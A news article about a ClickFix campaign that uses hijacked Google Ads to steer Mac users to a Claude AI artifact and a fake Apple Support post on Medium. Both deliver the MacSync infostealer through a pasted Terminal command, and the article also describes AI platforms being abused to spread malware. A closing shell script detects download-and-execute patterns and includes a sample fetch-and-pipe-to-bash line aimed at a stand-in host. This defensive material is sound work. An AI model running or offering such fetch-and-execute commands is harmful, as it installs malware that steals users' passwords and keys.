Cybersecurity researchers at Moonlock Lab, the investigative unit of the popular software developer MacPaw, have uncovered a clever new way that hackers are targeting Mac users. The campaign uses the ClickFix technique, in which people are tricked into copying and pasting dangerous commands directly into their computer’s Terminal, and the attack starts with a simple Google search.
How the Trap is Set
The hackers managed to hijack legitimate, verified Google Ads accounts belonging to Earth Rangers, a Canadian children’s charity, and a Colombian watch retailer called T S Q SA. Because these accounts have an established history and a good reputation, their malicious adverts bypassed Google’s security checks without any verification alarms.
When users search for common technical terms like “online DNS resolver,” “HomeBrew,” or “macos cli disk space analyzer,” they are shown a “sponsored” link at the top of the results. As the team at Moonlock Lab recently shared in a series of posts on X (formerly Twitter): “What if a Google Sponsored result for a common macOS query led to malware? That’s happening right now.”
Moonlock Lab (@moonlock_lab), February 11, 2026: “🧵 1/ 🚨 What if a Google Sponsored result for a common macOS query led to malware? That's happening right now and 15K+ people have already seen it. We at @MoonlockLab observed 2 variants today abusing legitimate platforms for ClickFix delivery: a @AnthropicAI public artifact on…”
These results lead to one of two traps:
- A Claude AI Artifact: A public page on the official Claude AI website titled “macOS Secure Command Execution.” Moonlock researchers warned that this fake guide had already been viewed over 15,600 times.
- A Medium Article: A post hosted at apple-mac-disk-space.medium[.]com, which is designed to impersonate the official Apple Support Team.
The ClickFix Trick
Most people tend to trust information found on official-looking platforms, and these pages exploit that trust. They provide a specific line of code and instruct the user to paste it into their Terminal to fix a problem or install a tool. Once a user runs this command, it secretly downloads the MacSync infostealer.
While all infostealers are designed to quietly hunt for private data, MacSync is particularly thorough. It targets your Keychain (where macOS stores system passwords), browser-saved logins, and private keys from cryptocurrency wallets. The stolen data is then bundled into a file named osalogging.zip and sent straight to the hackers’ server.
This isn’t the first time AI tools have been used this way; similar tricks were recently spotted using ChatGPT and Grok to spread malware.
Staying Safe
Researchers at Moonlock Lab believe the same group is behind both variants of the attack. Specifically, the malicious commands in both the Claude and Medium guides connect to the same Command-and-Control (C2) server to download the final payload. MacSync is also a more advanced rebrand of an older malware called Mac.c, which shows that these hackers are constantly refining their tools.
To stay safe, never paste a command into your Terminal if you do not fully understand what it does. It is always safer to download software directly from official websites rather than following links found in sponsored search results.
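One way to inspect a copied command before running it, as an added example that is not from the article or from Moonlock Lab: it labels download-and-execute traits and lists the hosts the command would contact. The function names, labels and sample commands are constructed for illustration, and the patterns are heuristics that also match legitimate installers of the same shape, so the listed host is what to verify.

```shell
#!/bin/sh
# Added example (not from the article): heuristic pre-flight check for a command
# copied from a web page. Function names, labels and samples are constructed.

# An interpreter, optionally behind sudo and/or an absolute path (/bin/bash).
INTERP='(sudo[[:space:]]+)?(/[^[:space:]]*/)?(sh|bash|zsh|python3?|osascript|perl)'

# matches CMD REGEX: succeeds when the extended regex matches, ignoring case.
matches() { printf '%s\n' "$1" | grep -Eiq -- "$2"; }

# vet_pasted_command CMD: prints space-separated labels for risky traits,
# or an empty line when none of the patterns match.
vet_pasted_command() {
  findings=""
  # Downloaded content piped straight into an interpreter: curl ... | sh
  matches "$1" "(curl|wget)[[:space:]][^|]*[|][[:space:]]*${INTERP}([[:space:]]|\$)" &&
    findings="$findings fetch-piped-to-interpreter"
  # Interpreter executing the output of a download: bash -c "$(curl ...)".
  # Homebrew's documented installer has this shape too, so check the host.
  matches "$1" "${INTERP}[[:space:]]+-c[[:space:]]+[\"']?[\$][(][[:space:]]*(curl|wget)" &&
    findings="$findings interpreter-runs-fetched-text"
  # Encoded blob decoded and executed, which hides what will actually run.
  matches "$1" "base64[[:space:]]+(-d|--decode)[^|]*[|][[:space:]]*${INTERP}([[:space:]]|\$)" &&
    findings="$findings decoded-blob-executed"
  printf '%s\n' "${findings# }"
}

# fetched_hosts CMD: prints each distinct host named in an http(s) URL.
fetched_hosts() {
  printf '%s\n' "$1" | grep -Eio 'https?://[^/"'"'"' )|]+' |
    sed 's#^[^:]*://##' | sort -u
}

# Constructed sample; example.invalid is a reserved name that never resolves.
sample='curl -fsSL https://example.invalid/fix.sh | bash'
printf 'flags: %s\nhosts: %s\n' \
  "$(vet_pasted_command "$sample")" "$(fetched_hosts "$sample")"
```

An empty result means only that none of these three shapes matched, not that the command is safe to run.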